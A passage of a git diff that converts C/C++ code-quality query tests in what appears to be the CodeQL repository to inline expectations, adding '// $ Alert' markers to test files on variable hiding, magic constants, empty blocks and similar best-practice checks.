MYMACRO; - for (int i = 0; i < 10; i++) {}; // local variable hides parameter of the same name + for (int i = 0; i < 10; i++) {}; // local variable hides parameter of the same name // $ Alert } #include "hiding.h" @@ -75,7 +75,7 @@ void myClass::myMethod(int arg1, T arg2) { { int protoArg1; T protoArg2; - int arg1; // local variable hides parameter of the same name - T arg2; // local variable hides parameter of the same name + int arg1; // local variable hides parameter of the same name // $ Alert + T arg2; // local variable hides parameter of the same name // $ Alert } } diff --git a/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesVariable/DeclarationHidesVariable.qlref b/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesVariable/DeclarationHidesVariable.qlref index 8f9a1799e066..73e5d81ddce2 100644 --- a/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesVariable/DeclarationHidesVariable.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesVariable/DeclarationHidesVariable.qlref @@ -1 +1,2 @@ -Best Practices/Hiding/DeclarationHidesVariable.ql +query: Best Practices/Hiding/DeclarationHidesVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesVariable/hiding.cpp b/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesVariable/hiding.cpp index 3a96933db7d2..b75dfbd55307 100644 --- a/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesVariable/hiding.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesVariable/hiding.cpp @@ -3,7 +3,7 @@ void f(void) { if (1) { int i; - for(int i = 1; i < 10; i++) { // BAD + for(int i = 1; i < 10; i++) { // BAD // $ Alert ; } } @@ -15,7 +15,7 @@ namespace foo { int k; try { for (i = 0; i < 3; i++) { - int k; // BAD + int k; // BAD // $ Alert } } catch (int e) { @@ -35,7 +35,7 @@ void structuredBinding() { int xs[1] = {1}; auto [x] = xs; { - auto [x] = xs; // BAD + auto [x] = xs; // BAD // $ Alert auto [y] = xs; // GOOD } } diff --git a/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/DeclarationHidesVariable.qlref b/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/DeclarationHidesVariable.qlref index 8f9a1799e066..73e5d81ddce2 100644 --- a/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/DeclarationHidesVariable.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/DeclarationHidesVariable.qlref @@ -1 +1,2 @@ -Best Practices/Hiding/DeclarationHidesVariable.ql +query: Best Practices/Hiding/DeclarationHidesVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/Hiding.c b/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/Hiding.c index f055d2fff89c..9f4b900239ae 100644 --- a/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/Hiding.c +++ b/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/Hiding.c @@ -12,16 +12,16 @@ void f(void) { if(1) { int k; if(1) { - int i; // BAD (hides local) - int j; // BAD (hides local) - int k; // BAD (hides local) + int i; // BAD (hides local) // $ Alert[cpp/declaration-hides-variable] + int j; // BAD (hides local) // $ Alert[cpp/declaration-hides-variable] + int k; // BAD (hides local) // $ Alert[cpp/declaration-hides-variable] int l; int m; int n; - int gi; // BAD (hides global) - int gj; // BAD (hides global) - int gk; // BAD (hides global) + int gi; // BAD (hides global) // $ Alert[cpp/local-variable-hides-global-variable] + int gj; // BAD (hides global) // $ Alert[cpp/local-variable-hides-global-variable] + int gk; // BAD (hides global) // $ Alert[cpp/local-variable-hides-global-variable] } int l; // GOOD (scopes do not overlap) } @@ -34,7 +34,7 @@ int g1, g2, g3, g4, g5; void function1(int g1); // GOOD (the hiding name isn't associated with a code block) extern void function2(int g2); // GOOD (the hiding name isn't associated with a code block) -void function3(int g3) {}; // BAD +void function3(int g3) {}; // BAD // $ Alert[cpp/local-variable-hides-global-variable] void function4(int g4); // GOOD (the hiding name isn't associated with a code block) -void function4(int g5) {}; // BAD +void function4(int g5) {}; // BAD // $ Alert[cpp/local-variable-hides-global-variable] diff --git a/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/LocalVariableHidesGlobalVariable.qlref b/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/LocalVariableHidesGlobalVariable.qlref index 0267b31251d3..326ddde08d3e 100644 --- a/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/LocalVariableHidesGlobalVariable.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/LocalVariableHidesGlobalVariable.qlref @@ -1 +1,2 @@ -Best Practices/Hiding/LocalVariableHidesGlobalVariable.ql +query: Best Practices/Hiding/LocalVariableHidesGlobalVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Likely Errors/CommaBeforeMisleadingIndentation/CommaBeforeMisleadingIndentation.qlref b/cpp/ql/test/query-tests/Best Practices/Likely Errors/CommaBeforeMisleadingIndentation/CommaBeforeMisleadingIndentation.qlref index 02b5f38e358f..97f91b75c951 100644 --- a/cpp/ql/test/query-tests/Best Practices/Likely Errors/CommaBeforeMisleadingIndentation/CommaBeforeMisleadingIndentation.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Likely Errors/CommaBeforeMisleadingIndentation/CommaBeforeMisleadingIndentation.qlref @@ -1 +1,2 @@ -Best Practices/Likely Errors/CommaBeforeMisleadingIndentation.ql +query: Best Practices/Likely Errors/CommaBeforeMisleadingIndentation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Likely Errors/CommaBeforeMisleadingIndentation/test.cpp b/cpp/ql/test/query-tests/Best Practices/Likely Errors/CommaBeforeMisleadingIndentation/test.cpp index dbf792db3383..49040bf6f480 100644 --- a/cpp/ql/test/query-tests/Best Practices/Likely Errors/CommaBeforeMisleadingIndentation/test.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Likely Errors/CommaBeforeMisleadingIndentation/test.cpp @@ -46,10 +46,10 @@ int Foo::test(int (*baz)(int)) if (i) (void)i, // BAD - (void)j; + (void)j; // $ Alert if (1) FOO(i), - (void)x.foo(j); // BAD + (void)x.foo(j); // BAD // $ Alert // Parenthesized comma (borderline example): @@ -157,13 +157,13 @@ int Foo::test(int (*baz)(int)) if (i) (void)i, // GOOD if tab >= 4 spaces else BAD -- can't exclude w/o source code text :/ - (void)j; + (void)j; // $ Alert // LHS ends on same line RHS begins on: if (1) foo( i++ - ), j++; // GOOD? [FALSE POSITIVE] + ), j++; // GOOD? [FALSE POSITIVE] // $ Alert if (1) baz( i++ @@ -175,7 +175,7 @@ int Foo::test(int (*baz)(int)) return i++ , i++ // GOOD(?) [FALSE POSITIVE] -- can't exclude w/o source code text :/ ? 1 - : 2; + : 2; // $ Alert int quux = (tata->titi.tutu(), diff --git a/cpp/ql/test/query-tests/Best Practices/Likely Errors/EmptyBlock/EmptyBlock.qlref b/cpp/ql/test/query-tests/Best Practices/Likely Errors/EmptyBlock/EmptyBlock.qlref index c794984448a1..889bef274a4f 100644 --- a/cpp/ql/test/query-tests/Best Practices/Likely Errors/EmptyBlock/EmptyBlock.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Likely Errors/EmptyBlock/EmptyBlock.qlref @@ -1 +1,2 @@ -Best Practices/Likely Errors/EmptyBlock.ql +query: Best Practices/Likely Errors/EmptyBlock.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Likely Errors/EmptyBlock/empty_block.cpp b/cpp/ql/test/query-tests/Best Practices/Likely Errors/EmptyBlock/empty_block.cpp index 8a8714d310f4..1c6819e36836 100644 --- a/cpp/ql/test/query-tests/Best Practices/Likely Errors/EmptyBlock/empty_block.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Likely Errors/EmptyBlock/empty_block.cpp @@ -6,11 +6,11 @@ void f() { int f(int x) { // BAD: - if (x) {} + if (x) {} // $ Alert // BAD: if (x) { - } + } // $ Alert if (x) { // GOOD (has comment) @@ -18,7 +18,7 @@ int f(int x) { // BAD (comment comes after): if (x) { - } + } // $ Alert // comment // GOOD (exception for loops with block on same line): diff --git a/cpp/ql/test/query-tests/Best Practices/Likely Errors/OffsetUseBeforeRangeCheck/OffsetUseBeforeRangeCheck.qlref b/cpp/ql/test/query-tests/Best Practices/Likely Errors/OffsetUseBeforeRangeCheck/OffsetUseBeforeRangeCheck.qlref index d934901f174f..0e9b8f83382e 100644 --- a/cpp/ql/test/query-tests/Best Practices/Likely Errors/OffsetUseBeforeRangeCheck/OffsetUseBeforeRangeCheck.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Likely Errors/OffsetUseBeforeRangeCheck/OffsetUseBeforeRangeCheck.qlref @@ -1 +1,2 @@ -Best Practices/Likely Errors/OffsetUseBeforeRangeCheck.ql \ No newline at end of file +query: Best Practices/Likely Errors/OffsetUseBeforeRangeCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Likely Errors/OffsetUseBeforeRangeCheck/test.cpp b/cpp/ql/test/query-tests/Best Practices/Likely Errors/OffsetUseBeforeRangeCheck/test.cpp index 0c7baf7b7ffb..2cf1d8e43c69 100644 --- a/cpp/ql/test/query-tests/Best Practices/Likely Errors/OffsetUseBeforeRangeCheck/test.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Likely Errors/OffsetUseBeforeRangeCheck/test.cpp @@ -8,11 +8,11 @@ void test(char *buffer, int bufferSize) while ((i < bufferSize) && (buffer[i] == ' ')) { i++; } // GOOD i = 0; - while ((buffer[i] == ' ') && (i < bufferSize)) { i++; } // BAD + while ((buffer[i] == ' ') && (i < bufferSize)) { i++; } // BAD // $ Alert // check for 'x' if ((i < bufferSize) && (buffer[i] == 'x')) {} // GOOD - if ((buffer[i] == 'x') && (i < bufferSize)) {} // BAD + if ((buffer[i] == 'x') && (i < bufferSize)) {} // BAD // $ Alert if ((bufferSize > i) && (buffer[i] == 'x')) {} // GOOD if ((buffer[i] == 'x') && (bufferSize > i)) {} // BAD [NOT DETECTED] @@ -24,7 +24,7 @@ void test(char *buffer, int bufferSize) if ((buffer[i] == 'x') && (bufferSize >= i + 1)) {} // BAD [NOT DETECTED] if ((i < bufferSize) && (true) && (buffer[i] == 'x')) {} // GOOD - if ((buffer[i] == 'x') && (true) && (i < bufferSize)) {} // BAD + if ((buffer[i] == 'x') && (true) && (i < bufferSize)) {} // BAD // $ Alert if ((i < bufferSize - 1) && (buffer[i + 1] == 'x')) {} // GOOD if ((buffer[i + 1] == 'x') && (i < bufferSize - 1)) {} // BAD [NOT DETECTED] @@ -36,15 +36,15 @@ void test(char *buffer, int bufferSize) // look for 'ab' for (i = 0; i < bufferSize; i++) { - if ((buffer[i] == 'a') && (i < bufferSize - 1) && (buffer[i + 1] == 'b')) // GOOD [FALSE POSITIVE] + if ((buffer[i] == 'a') && (i < bufferSize - 1) && (buffer[i + 1] == 'b')) // GOOD [FALSE POSITIVE] // $ Alert break; } if ((i < bufferSize) && (buffer[i])) {} // GOOD - if ((buffer[i]) && (i < bufferSize)) {} // BAD + if ((buffer[i]) && (i < bufferSize)) {} // BAD // $ Alert if ((i < bufferSize) && (buffer[i] + 1 == 'x')) {} // GOOD - if ((buffer[i] + 1 == 'x') && (i < bufferSize)) {} // BAD + if ((buffer[i] + 1 == 'x') && (i < bufferSize)) {} // BAD // $ Alert if ((buffer != 0) && (i < bufferSize)) {} // GOOD } diff --git a/cpp/ql/test/query-tests/Best Practices/Likely Errors/Slicing/Slicing.qlref b/cpp/ql/test/query-tests/Best Practices/Likely Errors/Slicing/Slicing.qlref index 03280a5c23d9..eb0ac9eff2ea 100644 --- a/cpp/ql/test/query-tests/Best Practices/Likely Errors/Slicing/Slicing.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Likely Errors/Slicing/Slicing.qlref @@ -1 +1,2 @@ -Best Practices/Likely Errors/Slicing.ql +query: Best Practices/Likely Errors/Slicing.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Likely Errors/Slicing/test.cpp b/cpp/ql/test/query-tests/Best Practices/Likely Errors/Slicing/test.cpp index b46c749e70e8..7b28598afee4 100644 --- a/cpp/ql/test/query-tests/Best Practices/Likely Errors/Slicing/test.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Likely Errors/Slicing/test.cpp @@ -10,7 +10,7 @@ struct Point3 : Point2 { void f() { Point2 p2; Point3 p3; - p2 = p3; + p2 = p3; // $ Alert } void g() { diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/ConstructorOrMethodWithExactDate.cpp b/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/ConstructorOrMethodWithExactDate.cpp index 2720aa8f4035..8c11a811cd63 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/ConstructorOrMethodWithExactDate.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/ConstructorOrMethodWithExactDate.cpp @@ -24,20 +24,20 @@ int Main() { // BAD: constructor creating a EraInfo with exact Heisei era start date - EraInfo * pDateTimeUtil = new EraInfo(1989, 1, 8); + EraInfo * pDateTimeUtil = new EraInfo(1989, 1, 8); // $ Alert // BAD: constructor creating a EraInfo with exact Heisei era start date - EraInfo * pDateTimeUtil1 = new EraInfo(1, 2, 1989, 1, 8, L"\u5e73\u6210"); + EraInfo * pDateTimeUtil1 = new EraInfo(1, 2, 1989, 1, 8, L"\u5e73\u6210"); // $ Alert // Good: constructor creating a EraInfo with another date EraInfo * pDateTimeUtil2 = new EraInfo(1, 2, 1900, 1, 1, L"foo"); // BAD: method call passing exact Haisei era start date as parameters - EraInfo * pDateTimeUtil3 = EraInfo::EraInfoFromDate(1, 2, 1989, 1, 8, L"\u5e73\u6210"); + EraInfo * pDateTimeUtil3 = EraInfo::EraInfoFromDate(1, 2, 1989, 1, 8, L"\u5e73\u6210"); // $ Alert // GOOD: method call with the same parameters in a different order (we only track year, month, day) EraInfo * pDateTimeUtil4 = EraInfo::EraInfoFromDate(1, 2, 8, 1, 1989, L"\u5e73\u6210"); // BAD: constructor creating a EraInfo with exact Reiwa era start date - EraInfo * pDateTimeUtil5 = new EraInfo(2019, 5, 1); + EraInfo * pDateTimeUtil5 = new EraInfo(2019, 5, 1); // $ Alert } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/JapaneseEraDate.qlref b/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/JapaneseEraDate.qlref index 4240387a36ce..652bac2ede77 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/JapaneseEraDate.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/JapaneseEraDate.qlref @@ -1 +1,2 @@ -Best Practices/Magic Constants/JapaneseEraDate.ql +query: Best Practices/Magic Constants/JapaneseEraDate.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/StructWithExactDate.cpp b/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/StructWithExactDate.cpp index 7bbf3397ff91..aca98d531851 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/StructWithExactDate.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/StructWithExactDate.cpp @@ -28,7 +28,7 @@ int main() { // BAD: Creation of tm stuct corresponding to the beginning of Heisei era tm *timeTm = new tm(); - timeTm->tm_year = 1989; + timeTm->tm_year = 1989; // $ Alert timeTm->tm_mon = 1; timeTm->tm_mday = 8; @@ -43,7 +43,7 @@ int main() SYSTEMTIME st; st.wDay = 8; st.wMonth = 1; - st.wYear = 1989; + st.wYear = 1989; // $ Alert // GOOD: Creation of SYSTEMTIME stuct with a different date @@ -57,7 +57,7 @@ int main() SYSTEMTIME st2; st2.wDay = 1; st2.wMonth = 5; - st2.wYear = 2019; + st2.wYear = 2019; // $ Alert return 0; } diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/MagicConstantsNumbers.qlref b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/MagicConstantsNumbers.qlref index 46d0c7be3af2..2e58ec2fd5f8 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/MagicConstantsNumbers.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/MagicConstantsNumbers.qlref @@ -1 +1,2 @@ -Best Practices/Magic Constants/MagicConstantsNumbers.ql +query: Best Practices/Magic Constants/MagicConstantsNumbers.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/a123.c b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/a123.c index f4d259ee5b95..61fc525f5505 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/a123.c +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/a123.c @@ -2,6 +2,6 @@ static void f(void) { int i; - i = 123; + i = 123; // $ Alert } diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/b123.c b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/b123.c index dc4dfd79f8f7..3551b7898d2d 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/b123.c +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/b123.c @@ -1,5 +1,5 @@ static void f(void) { - char str[123]; + char str[123]; // $ Alert } diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/case.c b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/case.c index 73b67768c95a..ad76feb26155 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/case.c +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/case.c @@ -1,7 +1,7 @@ void f(int i) { switch(i) { - case 123 ... 129: + case 123 ... 129: // $ Alert break; } } diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/constants.h b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/constants.h index 7136026997f2..3026ecf39bf2 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/constants.h +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/constants.h @@ -2,7 +2,7 @@ void FUN(void) { int i, j, k; - i = 123; + i = 123; // $ Alert i = 123; i = 123; i = 123; @@ -57,7 +57,7 @@ void FUN(void) { k = 789; k = 789; - i = 0x0078; + i = 0x0078; // $ Alert i = 0x0078; i = 0x0078; i = 0x0078; @@ -88,7 +88,7 @@ void FUN(void) { i = 0x0078; i = 0x0078; - i = 0x01f8; + i = 0x01f8; // $ Alert i = 0x01f8; i = 0x01f8; i = 0x01f8; @@ -119,7 +119,7 @@ void FUN(void) { i = 0x01f8; i = 0x01f8; - i = 278UL; + i = 278UL; // $ Alert i = 278UL; i = 278UL; i = 278UL; @@ -150,7 +150,7 @@ void FUN(void) { i = 278UL; i = 278UL; - i = -129; + i = -129; // $ Alert i = -129; i = -129; i = -129; diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/functions.h b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/functions.h index 43e7b089389b..db7e962a5e4a 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/functions.h +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/functions.h @@ -1,6 +1,6 @@ int myFunction1(int x = - 102 + 102 + 102 + + 102 + 102 + 102 + // $ Alert 102 + 102 + 102 + 102 + 102 + 102 + 102 + 102 + 102 + @@ -9,7 +9,7 @@ int myFunction1(int x = 102 + 102 + 102); void myFunction2( - int p1 = 103, + int p1 = 103, // $ Alert int p2 = 103, int p3 = 103, int p4 = 103, diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/templates.cpp b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/templates.cpp index be73c87951c1..0ee90dc2460c 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/templates.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/templates.cpp @@ -1,7 +1,7 @@ template void f(T x) { - 23; + 23; // $ Alert 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; @@ -10,7 +10,7 @@ void f(T x) { void g(void) { int i; f(i); - 25; + 25; // $ Alert 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/MagicConstantsString.qlref b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/MagicConstantsString.qlref index 9caedcf3cc42..a75d078753d5 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/MagicConstantsString.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/MagicConstantsString.qlref @@ -1 +1,2 @@ -Best Practices/Magic Constants/MagicConstantsString.ql +query: Best Practices/Magic Constants/MagicConstantsString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/constants.h b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/constants.h index 231fb35a85da..42537352dffd 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/constants.h +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/constants.h @@ -2,7 +2,7 @@ void FUN(void) { const char *s; - s = "abcabcabc"; + s = "abcabcabc"; // $ Alert s = "abcabcabc"; s = "abcabcabc"; s = "abcabcabc"; diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/joining.cpp b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/joining.cpp index 766de394c494..ab0a45454451 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/joining.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/joining.cpp @@ -36,7 +36,7 @@ void fn(const string &str1); void joining_test(const string &x, const string &y) \ { - fn("testrepo.git"); // BAD: "testrepo.git" + fn("testrepo.git"); // BAD: "testrepo.git" // $ Alert fn("testrepo.git"); fn("testrepo.git"); fn("testrepo.git"); @@ -104,7 +104,7 @@ void joining_test(const string &x, const string &y) \ ostream os; - os << "NO T_VOID CONSTRUCT"; // BAD: "NO T_VOID CONSTRUCT" + os << "NO T_VOID CONSTRUCT"; // BAD: "NO T_VOID CONSTRUCT" // $ Alert os << "NO T_VOID CONSTRUCT"; os << "NO T_VOID CONSTRUCT"; os << "NO T_VOID CONSTRUCT"; @@ -170,7 +170,7 @@ void joining_test(const string &x, const string &y) \ os << "writeString(" << x << ")"; os << "writeString(" << x << ")"; // (21 times) - os << "compiler error: no const of base type " + x; // BAD: "compiler error: no const of base type " + os << "compiler error: no const of base type " + x; // BAD: "compiler error: no const of base type " // $ Alert os << "compiler error: no const of base type " + x; os << "compiler error: no const of base type " + x; os << "compiler error: no const of base type " + x; diff --git a/cpp/ql/test/query-tests/Best Practices/RuleOfTwo/RuleOfTwo.cpp b/cpp/ql/test/query-tests/Best Practices/RuleOfTwo/RuleOfTwo.cpp index b28d6c809dab..946d024691b3 100644 --- a/cpp/ql/test/query-tests/Best Practices/RuleOfTwo/RuleOfTwo.cpp +++ b/cpp/ql/test/query-tests/Best Practices/RuleOfTwo/RuleOfTwo.cpp @@ -1,13 +1,13 @@ // NOT OK struct CopyButNoAssign { CopyButNoAssign() : n(0) {} - CopyButNoAssign(const CopyButNoAssign& copy_from) : n(copy_from.n) {} + CopyButNoAssign(const CopyButNoAssign& copy_from) : n(copy_from.n) {} // $ Alert int n; }; // NOT OK struct AssignButNoCopy { - AssignButNoCopy& operator=(const AssignButNoCopy& assign_from) { return *this; } + AssignButNoCopy& operator=(const AssignButNoCopy& assign_from) { return *this; } // $ Alert }; // OK: before C++11, marking a constructor as private was an @@ -78,7 +78,7 @@ struct NotFriend { // friend of CopyableByFriend. struct MyClassFriend { CopyableByFriend x; - MyClassFriend& operator=(const MyClassFriend& that) { return *this; } + MyClassFriend& operator=(const MyClassFriend& that) { return *this; } // $ Alert }; // OK or NOT OK? An explicit default and an explicit implementation. @@ -141,7 +141,7 @@ struct ProtectedAssign { // NOT OK: this class gets a copy assignment operator because it can access the // (protected) copy assignment operator of its base class. struct IsAProtectedAssign: public ProtectedAssign { - IsAProtectedAssign(const IsAProtectedAssign& that) {} + IsAProtectedAssign(const IsAProtectedAssign& that) {} // $ Alert }; // OK: this class gets no copy assignment operator. It cannot access the @@ -164,7 +164,7 @@ struct ProtectedCC { // NOT OK: this class gets a copy constructor because it can access the // (protected) copy constructor of its base class. struct IsAProtectedCC: public ProtectedCC { - IsAProtectedCC& operator=(const IsAProtectedCC& that) { return *this; } + IsAProtectedCC& operator=(const IsAProtectedCC& that) { return *this; } // $ Alert }; // OK: this class gets no copy constructor. It cannot access the (protected) @@ -309,5 +309,5 @@ class R1_B { // is generated by the compiler and callable outside the class. class R1_C { public: - R1_C(const R1_C& c) {} + R1_C(const R1_C& c) {} // $ Alert }; diff --git a/cpp/ql/test/query-tests/Best Practices/RuleOfTwo/RuleOfTwo.qlref b/cpp/ql/test/query-tests/Best Practices/RuleOfTwo/RuleOfTwo.qlref index eb42b255e975..1a88c8671415 100644 --- a/cpp/ql/test/query-tests/Best Practices/RuleOfTwo/RuleOfTwo.qlref +++ b/cpp/ql/test/query-tests/Best Practices/RuleOfTwo/RuleOfTwo.qlref @@ -1 +1,2 @@ -Best Practices/RuleOfTwo.ql +query: Best Practices/RuleOfTwo.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/SloppyGlobal/SloppyGlobal.qlref b/cpp/ql/test/query-tests/Best Practices/SloppyGlobal/SloppyGlobal.qlref index eb57378dea6b..6d979e18a560 100644 --- a/cpp/ql/test/query-tests/Best Practices/SloppyGlobal/SloppyGlobal.qlref +++ b/cpp/ql/test/query-tests/Best Practices/SloppyGlobal/SloppyGlobal.qlref @@ -1 +1,2 @@ -Best Practices/SloppyGlobal.ql +query: Best Practices/SloppyGlobal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/SloppyGlobal/main.cpp b/cpp/ql/test/query-tests/Best Practices/SloppyGlobal/main.cpp index e279fbf02579..3fec05342802 100644 --- a/cpp/ql/test/query-tests/Best Practices/SloppyGlobal/main.cpp +++ b/cpp/ql/test/query-tests/Best Practices/SloppyGlobal/main.cpp @@ -1,19 +1,19 @@ // main.cpp -int x; // BAD: too short -int ys[1000000]; // BAD: too short +int x; // BAD: too short // $ Alert +int ys[1000000]; // BAD: too short // $ Alert int descriptive_name; // GOOD: sufficient static int z; // GOOD: not a global -int v1; // BAD: too short -int v2; // BAD: too short +int v1; // BAD: too short // $ Alert +int v2; // BAD: too short // $ Alert template -T v3; // BAD: too short +T v3; // BAD: too short // $ Alert template -T v4; // BAD: too short +T v4; // BAD: too short // $ Alert template -T v5; // BAD: too short +T v5; // BAD: too short // $ Alert void use_some_fs() { v2 = 100; diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedIncludes/unusedIncludes.cpp b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedIncludes/unusedIncludes.cpp index b4d0012cd920..98a530cb276b 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedIncludes/unusedIncludes.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedIncludes/unusedIncludes.cpp @@ -1,12 +1,12 @@ // unusedIncludes.cpp -#include "a.h" // unused +#include "a.h" // unused // $ Alert #include "b.h" #include "c.h" #include "d.hpp" -#include "e.hpp" // unused -#include "f.fwd.hpp" // unused -#include "g" // unused +#include "e.hpp" // unused // $ Alert +#include "f.fwd.hpp" // unused // $ Alert +#include "g" // unused // $ Alert int val_b = 